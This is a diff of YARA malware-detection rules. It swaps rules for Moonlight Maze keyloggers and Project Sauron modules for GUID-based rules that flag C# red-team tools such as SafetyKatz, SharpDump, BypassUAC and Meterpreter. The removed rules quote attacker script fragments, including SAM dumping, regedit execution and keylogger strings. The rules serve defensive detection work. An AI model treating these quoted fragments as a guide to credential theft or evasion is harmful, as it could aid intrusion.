+		$typelibguid0lo = "8fe5b811-a2cb-417f-af93-6a3cf6650af1" ascii wide
+		$typelibguid0up = "8FE5B811-A2CB-417F-AF93-6A3CF6650AF1" ascii wide
 
 	condition:
-		(( 3 of ( $a* ) ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Xk_Keylogger
+rule SIGNATURE_BASE_HKTL_NET_GUID_Safetykatz : FILE
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'xk' keylogger"
-		author = "Kaspersky Lab"
-		id = "cf585cd0-afdd-5782-a6e5-bb9509cbf01d"
-		date = "2017-03-27"
-		modified = "2017-03-27"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L170-L202"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5f6d7432-0bb5-5782-98ec-2c2168f2fc1f"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/GhostPack/SafetyKatz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1072-L1086"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b2acdef9c8e545f4ab217f529a7e4a3e74723b27ec89896f98639fd40792bcc8"
+		logic_hash = "3de5223d6cbd3af386210531506b270d94a5b89d7e3582e248571e31d3c191d8"
 		score = 75
-		quality = 35
-		tags = ""
-		version = "1.0"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Log ended at => %s"
-		$a2 = "Log started at => %s [pid %d]"
-		$a3 = "/var/tmp/task" fullword
-		$a4 = "/var/tmp/taskhost" fullword
-		$a5 = "my hostname: %s"
-		$a6 = "/var/tmp/tasklog"
-		$a7 = "/var/tmp/.Xtmp01" fullword
-		$a8 = "myfilename=-%s-"
-		$a9 = "/var/tmp/taskpid"
-		$a10 = "mypid=-%d-" fullword
-		$a11 = "/var/tmp/taskgid" fullword
-		$a12 = "mygid=-%d-" fullword
+		$typelibguid0lo = "8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii wide
+		$typelibguid0up = "8347E81B-89FC-42A9-B22C-F59A6A572DEC" ascii wide
 
 	condition:
-		(( 3 of ( $a* ) ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Encrypted_Keylog : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dropless_Malware : FILE
 {
 	meta:
-		description = "Rule to detect Moonlight Maze encrypted keylogger logs"
-		author = "Kaspersky Lab"
-		id = "f0d464f0-3955-5f41-a57f-8aa225e1171d"
-		date = "2017-03-27"
-		modified = "2017-03-27"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L204-L222"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0da3b6d8-2002-590e-a8d5-f6c84acfb083"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/Dropless-Malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1088-L1102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "593f6f2148ddb52e2beee72a48135cd83f126edfdb263b471432d17273e536db"
+		logic_hash = "832d175372c322cd488594be558819375fb9f9f100ff0cbb880231c9fc7138f7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = {47 01 22 2A 6D 3E 39 2C}
+		$typelibguid0lo = "23b739f7-2355-491e-a7cd-a8485d39d6d6" ascii wide
+		$typelibguid0up = "23B739F7-2355-491E-A7CD-A8485D39D6D6" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x2a220147 and ( $a1 at 0 )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Scripts
+rule SIGNATURE_BASE_HKTL_NET_GUID_UAC_Silentclean : FILE
 {
 	meta:
-		description = "Detects scripts (mostly LUA) from Project Sauron report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "575a6f1b-5a4d-5f81-b44a-b7025dbec2a5"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L1-L25"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2dde9632-10c5-5c91-8bd9-2fb80d6f0c49"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/EncodeGroup/UAC-SilentClean"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1104-L1118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "275ec8de40ae973b4ec4c891c56a70fc2fd05abff258b8015d986d0106506367"
+		logic_hash = "2e624d84a6d47c99b28ef41918f1d88cb219a90d35691d0cce8fe10a0a237650"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "local t = w.exec2str(\"regedit "
-		$x2 = "local r = w.exec2str(\"cat"
-		$x3 = "ap*.txt link*.txt node*.tun VirtualEncryptedNetwork.licence"
-		$x4 = "move O FakeVirtualEncryptedNetwork.dll"
-		$x5 = "sinfo | basex b 32url | dext l 30"
-		$x6 = "w.exec2str(execStr)"
-		$x7 = "netnfo irc | basex b 32url"
-		$x8 = "w.exec(\"wfw status\")"
-		$x9 = "exec(\"samdump\")"
-		$x10 = "cat VirtualEncryptedNetwork.ini|grep"
-		$x11 = "if string.lower(k) == \"securityproviders\" then"
-		$x12 = "exec2str(\"plist b | grep netsvcs\")"
-		$x14 = "SAURON_KBLOG_KEY ="
+		$typelibguid0lo = "948152a4-a4a1-4260-a224-204255bfee72" ascii wide
+		$typelibguid0up = "948152A4-A4A1-4260-A224-204255BFEE72" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_Dsniff
+rule SIGNATURE_BASE_HKTL_NET_GUID_Desktopgrabber : FILE
 {
 	meta:
-		description = "Detects Dsniff hack tool"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eb39185b-330f-5b93-ac58-0465e5767919"
-		date = "2019-02-19"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L27-L39"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "7db07291-d6d4-5527-a879-27f899dbd6fe"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/DesktopGrabber"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1120-L1134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0edd3ba7e78ee2810aa3c7643a96382c1fe0b5e627913a5a9bac2e83c8d40274"
-		score = 55
+		logic_hash = "150a2f89eee5e5e0fa77c42b004e170d8706db69e02293f297376933ec03d1be"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = ".*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*"
+		$typelibguid0lo = "e6aa0cd5-9537-47a0-8c85-1fbe284a4380" ascii wide
+		$typelibguid0up = "E6AA0CD5-9537-47A0-8C85-1FBE284A4380" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Arping_Module
+rule SIGNATURE_BASE_HKTL_NET_GUID_Wsmanager : FILE
 {
 	meta:
-		description = "Detects strings from arping module - Project Sauron report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "42389511-de92-57cb-9dee-9f829fd5e55a"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L41-L55"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b8c330dc-74aa-5a33-8af6-17c9beb8be81"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/guillaC/wsManager"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1136-L1150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d87e91441994c4ed863596d79c108c9f72adfb708f885cb63a881eb25aa089b7"
+		logic_hash = "f335250f717cdcc2e9c6022a1fc22a61b4eec59a5c69c9359c2f7658081117b3"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Resolve hosts that answer"
-		$s2 = "Print only replying Ips"
-		$s3 = "Do not display MAC addresses"
+		$typelibguid0lo = "9480809e-5472-44f3-b076-dcdf7379e766" ascii wide
+		$typelibguid0up = "9480809E-5472-44F3-B076-DCDF7379E766" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Kblogi_Module
+rule SIGNATURE_BASE_HKTL_NET_GUID_Uglyexe : FILE
 {
 	meta:
-		description = "Detects strings from kblogi module - Project Sauron report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e1dd4d1a-1089-5897-8f4a-52c7068802fa"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L57-L71"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5833e6c5-f078-5eb5-9519-76710d7da0e1"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/fashionproof/UglyEXe"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1152-L1166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bba87b17a62fc968e89d4f6d10de06875c6b7f47c8bb7ae3f7932804b23a8e87"
+		logic_hash = "7f3e5ef8fc7d6994c1ebab8fc35624691d8f200acf6068b0948fd818f8ad2223"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Inject using process name or pid. Default"
-		$s2 = "Convert mode: Read log from file and convert to text"
-		$s3 = "Maximum running time in seconds"
+		$typelibguid0lo = "233de44b-4ec1-475d-a7d6-16da48d6fc8d" ascii wide
+		$typelibguid0up = "233DE44B-4EC1-475D-A7D6-16DA48D6FC8D" ascii wide
 
 	condition:
-		$x1 or 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Basex_Module
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdump : FILE
 {
 	meta:
-		description = "Detects strings from basex module - Project Sauron report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "51ef3826-af5c-562b-a1f8-3bf11532ac2d"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L73-L87"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b613092f-9006-5405-b07e-59737410ac1e"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/GhostPack/SharpDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1168-L1182"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "90cfb58017d62312c56908aca1a48bb7425f5cd51540298ecf65305b46ffb2c8"
+		logic_hash = "65e28a356cc975a3014f59551035a324d21039e39a8596b5980ad0c0e4d0a811"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "64, 64url, 32, 32url or 16."
-		$s2 = "Force decoding when input is invalid/corrupt"
-		$s3 = "This cruft"
+		$typelibguid0lo = "79c9bba3-a0ea-431c-866c-77004802d8a0" ascii wide
+		$typelibguid0up = "79C9BBA3-A0EA-431C-866C-77004802D8A0" ascii wide
 
 	condition:
-		$x1 or 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Dext_Module
+rule SIGNATURE_BASE_HKTL_NET_GUID_Educationalrat : FILE
 {
 	meta:
-		description = "Detects strings from dext module - Project Sauron report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d69373e0-d6ad-5475-8766-06e865620ed8"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L89-L104"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b1d54bea-a6c4-5c57-9ee1-7438d503b01d"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/securesean/EducationalRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1184-L1198"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7dbfb3ddfffa6fa65800e07fdcc527650474740afa658567efe46830587cedae"
+		logic_hash = "ad6baa993ba3da60233da39ec55b10ab0fe3b2ca52882972b54c7d199e7b6abb"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Assemble rows of DNS names back to a single string of data"
-		$x2 = "removes checks of DNS names and lengths (during split)"
-		$x3 = "Randomize data lengths (length/2 to length)"
-		$x4 = "This cruft"
+		$typelibguid0lo = "8a18fbcf-8cac-482d-8ab7-08a44f0e278e" ascii wide
+		$typelibguid0up = "8A18FBCF-8CAC-482D-8AB7-08A44F0E278E" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Hacktool_This_Cruft : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Stealth_Kid_RAT : FILE
 {
 	meta:
-		description = "Detects string 'This cruft' often used in hack tools like netcat or cryptcat and also mentioned in Project Sauron report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a39de541-19b5-5b7e-a3dc-51a5309181e5"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L106-L119"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f26e040a-dcc7-518f-89f2-3333f83fa14a"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/ctsecurity/Stealth-Kid-RAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1200-L1216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "875c34e8048c3f98afc97683d0b3086c3396753cd9fb14bc68681c63ed77fd51"
-		score = 60
+		logic_hash = "0c251c306f416d7a3192d7a11d87b99ab62e2d32453ddecb75a3c517f24a0342"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "This cruft" fullword
+		$typelibguid0lo = "bf43cd33-c259-4711-8a0e-1a5c6c13811d" ascii wide
+		$typelibguid0up = "BF43CD33-C259-4711-8A0E-1A5C6C13811D" ascii wide
+		$typelibguid1lo = "e5b9df9b-a9e4-4754-8731-efc4e2667d88" ascii wide
+		$typelibguid1up = "E5B9DF9B-A9E4-4754-8731-EFC4E2667D88" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcradle : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c741bd7d-1885-55f1-a5b3-8f00fda2fe39"
-		date = "2016-08-09"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L130-L148"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e2123a73-2609-559d-a122-923ebf8fd668"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/anthemtotheego/SharpCradle"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1218-L1232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c81c996e487bdd840111513724ccf1220ee3bd8280d776aa4c128ef5263ee136"
+		logic_hash = "a56c456a7c4f61b65f603bc2c8449668a90e36f8b240bca8ea474d82e8174c78"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9"
 
 	strings:
-		$s1 = "ncnfloc.dll" fullword wide
-		$s4 = "Network Configuration Locator" fullword wide
-		$op0 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 }
-		$op1 = { 80 75 29 85 c9 79 25 b9 01 }
-		$op2 = { 2b d8 48 89 7c 24 38 44 89 6c 24 40 83 c3 08 89 }
+		$typelibguid0lo = "f70d2b71-4aae-4b24-9dae-55bc819c78bb" ascii wide
+		$typelibguid0up = "F70D2B71-4AAE-4B24-9DAE-55BC819C78BB" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Bypassuac : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "79abe5f2-a750-5018-a67f-6ee1c51a2ca1"
-		date = "2016-08-09"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L150-L167"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "327f581e-1d8c-5d20-bdd7-a29810c619c9"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/cnsimo/BypassUAC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1234-L1250"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "57099a802ee62a5183156f0b30713553b6fd83bbb5e1b453e9b25da0109b8777"
+		logic_hash = "e466c4e3da0e8bc98eac148c67831df639befab716e0da5c779e3caacbf349a8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8"
 
 	strings:
-		$s2 = "\\*\\3vpn" ascii
-		$op0 = { 55 8b ec 83 ec 0c 53 56 33 f6 39 75 08 57 89 75 }
-		$op1 = { 59 59 c3 8b 65 e8 ff 75 88 ff 15 50 20 40 00 ff }
-		$op2 = { 8b 4f 06 85 c9 74 14 83 f9 12 0f 82 a7 }
+		$typelibguid0lo = "4e7c140d-bcc4-4b15-8c11-adb4e54cc39a" ascii wide
+		$typelibguid0up = "4E7C140D-BCC4-4B15-8C11-ADB4E54CC39A" ascii wide
+		$typelibguid1lo = "cec553a7-1370-4bbc-9aae-b2f5dbde32b0" ascii wide
+		$typelibguid1up = "CEC553A7-1370-4BBC-9AAE-B2F5DBDE32B0" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( all of ( $s* ) ) and all of ( $op* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Hanzoinjection : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "555b37a2-6a3c-539f-81dc-24c739795510"
-		date = "2016-08-09"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L169-L186"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c432bf68-49bf-57c7-bbfa-7bd2f3506c52"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/P0cL4bs/hanzoInjection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1252-L1266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "739414990d112dd16e01831408ba745b04fae7621eb9074f73babbc40b69e1ad"
+		logic_hash = "aec8befc497505ea750ce0cfc1e0b1ef21b5a6b97660f5403d6612629edaa114"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec"
 
 	strings:
-		$s1 = "ExampleProject.dll" fullword ascii
-		$op0 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 ba }
-		$op1 = { ff 15 34 20 00 10 85 c0 59 a3 60 30 00 10 75 04 }
-		$op2 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 00 20 00 }
+		$typelibguid0lo = "32e22e25-b033-4d98-a0b3-3d2c3850f06c" ascii wide
+		$typelibguid0up = "32E22E25-B033-4D98-A0B3-3D2C3850F06C" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) ) and all of ( $op* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Clr_Meterpreter : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "32717ace-ff56-5b5b-8ed9-4bb353886eea"
-		date = "2016-08-09"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L188-L206"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1d8a9717-4d80-5fb1-9c57-9b5f6c5a18b0"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/OJ/clr-meterpreter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1268-L1292"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0735ba9591a9cf06cd13ba480b4559ef83105ab08ffcec21ebbbfdf3766edb93"
+		logic_hash = "15fb4e51fc1473fbee3b08c2a94b6a984cc5b9c92c8aab5641f161aef8b5f01b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57"
 
 	strings:
-		$s1 = "xpsmngr.dll" fullword wide
-		$s2 = "XPS Manager" fullword wide
-		$op0 = { 89 4d e8 89 4d ec 89 4d f0 ff d2 3d 08 00 00 c6 }
-		$op1 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 04 20 5b }
-		$op2 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 b6 }
+		$typelibguid0lo = "6840b249-1a0e-433b-be79-a927696ea4b3" ascii wide
+		$typelibguid0up = "6840B249-1A0E-433B-BE79-A927696EA4B3" ascii wide
+		$typelibguid1lo = "67c09d37-ac18-4f15-8dd6-b5da721c0df6" ascii wide
+		$typelibguid1up = "67C09D37-AC18-4F15-8DD6-B5DA721C0DF6" ascii wide
+		$typelibguid2lo = "e05d0deb-d724-4448-8c4c-53d6a8e670f3" ascii wide
+		$typelibguid2up = "E05D0DEB-D724-4448-8C4C-53D6A8E670F3" ascii wide
+		$typelibguid3lo = "c3cc72bf-62a2-4034-af66-e66da73e425d" ascii wide
+		$typelibguid3up = "C3CC72BF-62A2-4034-AF66-E66DA73E425D" ascii wide
+		$typelibguid4lo = "7ace3762-d8e1-4969-a5a0-dcaf7b18164e" ascii wide
+		$typelibguid4up = "7ACE3762-D8E1-4969-A5A0-DCAF7B18164E" ascii wide
+		$typelibguid5lo = "3296e4a3-94b5-4232-b423-44f4c7421cb3" ascii wide
+		$typelibguid5up = "3296E4A3-94B5-4232-B423-44F4C7421CB3" ascii wide
 
 	condition:
